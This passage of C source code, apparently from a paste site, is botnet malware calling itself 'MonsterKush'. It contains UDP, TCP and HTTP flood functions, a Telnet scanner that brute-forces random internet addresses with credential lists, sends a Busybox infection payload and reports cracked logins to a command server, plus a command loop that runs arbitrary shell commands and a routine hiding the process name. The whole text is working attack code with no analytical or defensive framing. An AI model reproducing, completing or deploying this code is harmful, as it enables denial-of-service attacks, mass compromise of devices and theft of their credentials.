- if(time(NULL) > end) break;
- i = 0;
- continue;
- }
- i++;
- }
- }
- void sendSTD(unsigned char *ip, int port, int secs)
- {
- int iSTD_Sock;
- iSTD_Sock = socket(AF_INET, SOCK_DGRAM, 0);
- time_t start = time(NULL);
- struct sockaddr_in sin;
- struct hostent *hp;
- hp = gethostbyname(ip);
- bzero((char*) &sin,sizeof(sin));
- bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
- sin.sin_family = hp->h_addrtype;
- sin.sin_port = port;
- unsigned int a = 0;
- while(1)
- {
- if (a >= 50)
- {
- send(iSTD_Sock, "dts", 50, 0);
- connect(iSTD_Sock,(struct sockaddr *) &sin, sizeof(sin));
- if (time(NULL) >= start + secs)
- {
- close(iSTD_Sock);
- _exit(0);
- }
- a = 0;
- }
- a++;
- }
- }
- int socket_connect(char *host, in_port_t port) {
- struct hostent *hp;
- struct sockaddr_in addr;
- int on = 1, sock;
- if ((hp = gethostbyname(host)) == NULL) return 0;
- bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
- addr.sin_port = htons(port);
- addr.sin_family = AF_INET;
- sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
- setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
- if (sock == -1) return 0;
- if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
- return sock;
- }
- void sendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power)
- {
- int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
- char request[512], buffer[1];
- for (i = 0; i < power; i++)
- {
- const char *ghpagents[] = {
- "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
- "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
- "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
- "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
- "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
- "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
- "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
- "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
- "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
- "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
- "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
- "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
- "wii libnup/1.0",
- "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
- "PSP (PlayStation Portable); 2.00",
- "Bunjalloo/0.7.6(Nintendo DS;U;en)",
- "Doris/1.15 [en] (Symbian)",
- "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
- "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
- "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
- "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
- "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
- "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
- "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
- "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
- "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
- "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
- "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
- "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
- "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
- "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
- "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
- "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
- "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
- "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
- };
- sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, ghpagents[(rand() % 36)]);
- if (fork())
- {
- while (end > time(NULL))
- {
- socket = socket_connect(host, port);
- if (socket != 0)
- {
- write(socket, request, strlen(request));
- read(socket, buffer, 1);
- close(socket);
- }
- }
- exit(0);
- }
- }
- }
- int contains_string(char* buffer, char** strings)
- {
- int num_strings = 0, i = 0;
- for(num_strings = 0; strings[++num_strings] != 0; );
- for(i = 0; i < num_strings; i++)
- {
- if(strcasestr(buffer, strings[i]))
- {
- return 1;
- }
- }
- return 0;
- }
- int contains_success(char* buffer)
- {
- return contains_string(buffer, successes);
- }
- int contains_fail(char* buffer)
- {
- return contains_string(buffer, fails);
- }
- int contains_response(char* buffer)
- {
- return contains_success(buffer) || contains_fail(buffer);
- }
- const char *get_telstate_host(struct telstate_t* telstate)
- {
- struct in_addr in_addr_ip;
- in_addr_ip.s_addr = telstate->ip;
- return inet_ntoa(in_addr_ip);
- }
- int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char **strings)
- {
- int num_bytes, i;
- memset(buffer, 0, buf_size);
- num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
- if(buffer[0] == 0xFF)
- {
- negotiate(fd, buffer, 3);
- }
- if(contains_string(buffer, strings))
- {
- return 1;
- }
- return 0;
- }
- int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size)
- {
- fd_set read_set;
- struct timeval tv;
- tv.tv_sec = 0;
- tv.tv_usec = timeout_usec;
- FD_ZERO(&read_set);
- FD_SET(fd, &read_set);
- if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
- return 0;
- return recv(fd, buffer, buf_size, 0);
- }
- void reset_telstate(struct telstate_t* telstate)
- {
- advance_telstate(telstate, 0);
- telstate->complete = 1;
- }
- void advance_telstate(struct telstate_t* telstate, int new_state)
- {
- if(new_state == 0)
- {
- close(telstate->fd);
- }
- telstate->tTimeout = 0;
- telstate->state = new_state;
- memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
- }
- in_addr_t getRandomPublicIP() {
- static uint8_t ipState[4] = {0};
- ipState[0] = rand() % 223;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- while(
- (ipState[0] == 0) ||
- (ipState[0] == 10) ||
- (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
- (ipState[0] == 127) ||
- (ipState[0] == 169 && ipState[1] == 254) ||
- (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
- (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
- (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
- (ipState[0] == 192 && ipState[1] == 168) ||
- (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
- (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
- (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
- (ipState[0] >= 224)
- )
- {
- ipState[0] = rand() % 223;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- }
- char ip[16] = {0};
- szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
- return inet_addr(ip);
- }
- void TelnetScanner(int wait_usec, int maxfds)
- {
- int max = getdtablesize() - 100, i, res, num_tmps, j;
- char buf[128], cur_dir;
- if (max > maxfds)
- max = maxfds;
- fd_set fdset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- char line[256];
- char* buffer;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- buffer = malloc(SOCKBUF_SIZE + 1);
- memset(buffer, 0, SOCKBUF_SIZE + 1);
- struct telstate_t fds[max];
- memset(fds, 0, max * (sizeof(int) + 1));
- for(i = 0; i < max; i++)
- {
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].complete = 1;
- fds[i].sockbuf = buffer;
- }
- while(1)
- {
- for(i = 0; i < max; i++)
- {
- if(fds[i].tTimeout == 0)
- {
- fds[i].tTimeout = time(NULL);
- }
- switch(fds[i].state)
- {
- case 0:
- {
- if(fds[i].complete == 1)
- {
- char *tmp = fds[i].sockbuf;
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].sockbuf = tmp;
- fds[i].ip = getRandomPublicIP();
- }
- else if(fds[i].complete == 0)
- {
- fds[i].usernameInd++;
- fds[i].passwordInd++;
- if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *))
- {
- fds[i].complete = 1;
- continue;
- }
- if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *))
- {
- fds[i].complete = 1;
- continue;
- }
- }
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- dest_addr.sin_addr.s_addr = fds[i].ip;
- fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
- if(fds[i].fd == -1) continue;
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
- if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
- {
- reset_telstate(&fds[i]);
- }
- else
- {
- advance_telstate(&fds[i], 1);
- }
- }
- break;
- case 1:
- {
- FD_ZERO(&fdset);
- FD_SET(fds[i].fd, &fdset);
- tv.tv_sec = 0;
- tv.tv_usec = wait_usec;
- res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
- if(res == 1)
- {
- fds[i].tTimeout = 0;
- lon = sizeof(int);
- valopt = 0;
- getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
- if(valopt)
- {
- reset_telstate(&fds[i]);
- }
- else
- {
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
- advance_telstate(&fds[i], 2);
- }
- continue;
- }
- else if(res == -1)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 2:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else
- {
- advance_telstate(&fds[i], 3);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 3:
- {
- //sending usernames.
- if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 4);
- }
- break;
- case 4:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else
- {
- advance_telstate(&fds[i], 5);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 5:
- {
- if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0)
- {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 6);
- }
- break;
- case 6:
- {
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, advances2))
- {
- fds[i].tTimeout = time(NULL);
- if(contains_fail(fds[i].sockbuf))
- {
- advance_telstate(&fds[i], 0);
- }
- else if(contains_success(fds[i].sockbuf))
- {
- if(fds[i].complete == 2)
- {
- advance_telstate(&fds[i], 7);
- }
- else
- {
- sockprintf(mainCommSock, "Successfully Bruted. || IP: %s || Username: %s || Password: %s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- advance_telstate(&fds[i], 7);
- }
- }
- else
- {
- reset_telstate(&fds[i]);
- }
- continue;
- }
- if(fds[i].tTimeout + 7 < time(NULL))
- {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 7:
- {
- fds[i].tTimeout = time(NULL);
- if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0);
- if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
- if(send(fds[i].fd, BusyboxPayload, strlen(BusyboxPayload), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; };
- sockprintf(mainCommSock, "Sending Infection Payload. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, "MonsterKush"))
- {
- if(strcasestr(fds[i].sockbuf, "MonsterKush") && fds[i].complete != 3)
- {
- sockprintf(mainCommSock, "Infection Success. || IP: %s: || Port: 23 || Username: %s || Password: %s", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- fds[i].complete = 3;
- }
- }
- if(fds[i].tTimeout + 10 < time(NULL))
- {
- if(fds[i].complete!=3)
- {
- sockprintf(mainCommSock, "Infection Failed. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- }
- reset_telstate(&fds[i]);
- }
- break;
- }
- }
- }
- }
- }
- void processCmd(int argc, unsigned char *argv[])
- {
- int x;
- if(!strcmp(argv[0], "PING"))
- {
- sockprintf(mainCommSock, "PONG!");
- return;
- }
- if(!strcmp(argv[0], "UDP"))
- {
- if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
- {
- return;
- }
- unsigned char *ip = argv[1];
- int port = atoi(argv[2]);
- int time = atoi(argv[3]);
- int spoofed = atoi(argv[4]);
- int packetsize = atoi(argv[5]);
- int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
- if(strstr(ip, ",") != NULL)
- {
- unsigned char *hi = strtok(ip, ",");
- while(hi != NULL)
- {
- if(!listFork())
- {
- sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
- _exit(0);
- }
- hi = strtok(NULL, ",");
- }
- }
- else
- {
- if (listFork())
- {
- return;
- }
- sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
- _exit(0);
- }
- }
- if(!strcmp(argv[0], "SCANNER"))
- {
- if(!strcmp(argv[1], "OFF"))
- {
- if(scanPid == 0) return;
- kill(scanPid, 9);
- scanPid = 0;
- }
- if(!strcmp(argv[1], "ON"))
- {
- if(scanPid != 0) return;
- uint32_t parent;
- parent = fork();
- if (parent > 0)
- {
- scanPid = parent;
- return;
- }
- else if(parent == -1) return;
- TelnetScanner(20, 1000);
- _exit(0);
- }
- }
- if(!strcmp(argv[0], "TCP"))
- {
- if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
- {
- return;
- }
- unsigned char *ip = argv[1];
- int port = atoi(argv[2]);
- int time = atoi(argv[3]);
- int spoofed = atoi(argv[4]);
- unsigned char *flags = argv[5];
- int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
- int psize = argc > 6 ? atoi(argv[6]) : 0;
- if(strstr(ip, ",") != NULL)
- {
- unsigned char *hi = strtok(ip, ",");
- while(hi != NULL)
- {
- if(!listFork())
- {
- sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
- _exit(0);
- }
- hi = strtok(NULL, ",");
- }
- }
- else
- {
- if (listFork())
- {
- return;
- }
- sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
- _exit(0);
- }
- }
- if(!strcmp(argv[0], "STD"))
- {
- if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
- {
- return;
- }
- unsigned char *ip = argv[1];
- int port = atoi(argv[2]);
- int time = atoi(argv[3]);
- if(strstr(ip, ",") != NULL)
- {
- unsigned char *hi = strtok(ip, ",");
- while(hi != NULL)
- {
- if(!listFork())
- {
- sendSTD(hi, port, time);
- _exit(0);
- }
- hi = strtok(NULL, ",");
- }
- }
- else
- {
- if (listFork())
- {
- return;
- }
- sendSTD(ip, port, time);
- _exit(0);
- }
- }
- if (!strcmp(argv[0], "HTTP"))
- {
- if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
- if (listFork()) return;
- sendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
- exit(0);
- }
- if(!strcmp(argv[0], "KILLATTK"))
- {
- int killed = 0;
- unsigned long i;
- for (i = 0; i < numpids; i++)
- {
- if (pids[i] != 0 && pids[i] != getpid())
- {
- kill(pids[i], 9);
- killed++;
- }
- }
- }
- if(!strcmp(argv[0], "LOLNOGTFO"))
- {
- exit(0);
- }
- }
- int initConnection()
- {
- unsigned char server[4096];
- memset(server, 0, 4096);
- if(mainCommSock)
- {
- close(mainCommSock);
- mainCommSock = 0;
- }
- if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
- else currentServer++;
- strcpy(server, commServer[currentServer]);
- int port = 6667;
- if(strchr(server, ':') != NULL)
- {
- port = atoi(strchr(server, ':') + 1);
- *((unsigned char *)(strchr(server, ':'))) = 0x0;
- }
- mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
- if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
- return 0;
- }
- int getOurIP()
- {
- int sock = socket(AF_INET, SOCK_DGRAM, 0);
- if(sock == -1) return 0;
- struct sockaddr_in serv;
- memset(&serv, 0, sizeof(serv));
- serv.sin_family = AF_INET;
- serv.sin_addr.s_addr = inet_addr("8.8.8.8");
- serv.sin_port = htons(53);
- int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
- if(err == -1) return 0;
- struct sockaddr_in name;
- socklen_t namelen = sizeof(name);
- err = getsockname(sock, (struct sockaddr*) &name, &namelen);
- if(err == -1) return 0;
- ourIP.s_addr = name.sin_addr.s_addr;
- int cmdline = open("/proc/net/route", O_RDONLY);
- char linebuf[4096];
- while(fdgets(linebuf, 4096, cmdline) != NULL)
- {
- if(strstr(linebuf, "\t00000000\t") != NULL)
- {
- unsigned char *pos = linebuf;
- while(*pos != '\t') pos++;
- *pos = 0;
- break;
- }
- memset(linebuf, 0, 4096);
- }
- close(cmdline);
- if(*linebuf)
- {
- int i;
- struct ifreq ifr;
- strcpy(ifr.ifr_name, linebuf);
- ioctl(sock, SIOCGIFHWADDR, &ifr);
- for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
- }
- close(sock);
- }
- char *getBuild()
- {
- #if defined(__x86_64__) || defined(_M_X64)
- return "x86_64";
- #elif defined(__i386) || defined(_M_IX86)
- return "x86_32";
- #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
- return "ARM-4";
- #elif defined(__ARM_ARCH_5__) || defined(__ARM_ARCH_5E__)
- return "ARM-5"
- #elif defined(__ARM_ARCH_6__) || defined(__ARM_ARCH_6T2__)
- return "ARM-6";
- #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS__) || defined(_mips_)
- return "MIPS";
- #elif defined(__sh__)
- return "SUPERH";
- #elif defined(__powerpc) || defined(__powerpc__) || defined(_ppc__) || defined(__PPC__) || defined(_ARCH_PPC)
- return "POWERPC";
- #else
- return "UNKNOWN";
- #endif
- }
- int main(int argc, unsigned char *argv[])
- {
- char *mynameis = "";
- if(SERVER_LIST_SIZE <= 0) return 0;
- strncpy(argv[0],"",strlen(argv[0]));
- argv[0] = "";
- prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
- srand(time(NULL) ^ getpid());
- init_rand(time(NULL) ^ getpid());
- pid_t pid1;
- pid_t pid2;
- int status;
- getOurIP();
- if (pid1 = fork())
- {
- waitpid(pid1, &status, 0);
- exit(0);
- }
- else if (!pid1)
- {
- if (pid2 = fork())
- {
- exit(0);
- }
- }
- setsid();
- chdir("/");
- signal(SIGPIPE, SIG_IGN);
- while(1)
- {
- if(initConnection())
- {
- sleep(5);
- continue;
- }
- sockprintf(mainCommSock, "MonsterKush Initialized. || Build: %s", getBuild());
- char commBuf[4096];
- int got = 0;
- int i = 0;
- while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
- {
- for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0)
- {
- unsigned int *newpids, on;
- for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
- pids[on - 1] = 0;
- numpids--;
- newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
- for (on = 0; on < numpids; on++) newpids[on] = pids[on];
- free(pids);
- pids = newpids;
- }
- commBuf[got] = 0x00;
- trim(commBuf);
- if(strstr(commBuf, "PING") == commBuf)
- {
- sockprintf(mainCommSock, "PONG");
- continue;
- }
- if(strstr(commBuf, "DUP") == commBuf) exit(0);
- unsigned char *message = commBuf;
- if(*message == '!')
- {
- unsigned char *nickMask = message + 1;
- while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
- if(*nickMask == 0x00) continue;
- *(nickMask) = 0x00;
- nickMask = message + 1;
- message = message + strlen(nickMask) + 2;
- while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
- unsigned char *command = message;
- while(*message != ' ' && *message != 0x00) message++;
- *message = 0x00;
- message++;
- unsigned char *tmpcommand = command;
- while(*tmpcommand)
- {
- *tmpcommand = toupper(*tmpcommand);
- tmpcommand++;
- }
- if(strcmp(command, "SH") == 0)
- {
- unsigned char buf[1024];
- int command;
- if (listFork()) continue;
- memset(buf, 0, 1024);
- szprintf(buf, "%s 2>&1", message);
- command = fdpopen(buf, "r");
- while(fdgets(buf, 1024, command) != NULL)
- {
- trim(buf);
- memset(buf, 0, 1024);
- sleep(1);
- }
- fdpclose(command);
- exit(0);
- }
- unsigned char *params[10];
- int paramsCount = 1;
- unsigned char *pch = strtok(message, " ");
- params[0] = command;
- while(pch)
- {
- if(*pch != '\n')
- {
- params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
- memset(params[paramsCount], 0, strlen(pch) + 1);
- strcpy(params[paramsCount], pch);
- paramsCount++;
- }
- pch = strtok(NULL, " ");
- }
- processCmd(paramsCount, params);
- if(paramsCount > 1)
- {
- int q = 1;
- for(q = 1; q < paramsCount; q++)
- {
- free(params[q]);
- }
- }
- }
- }
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
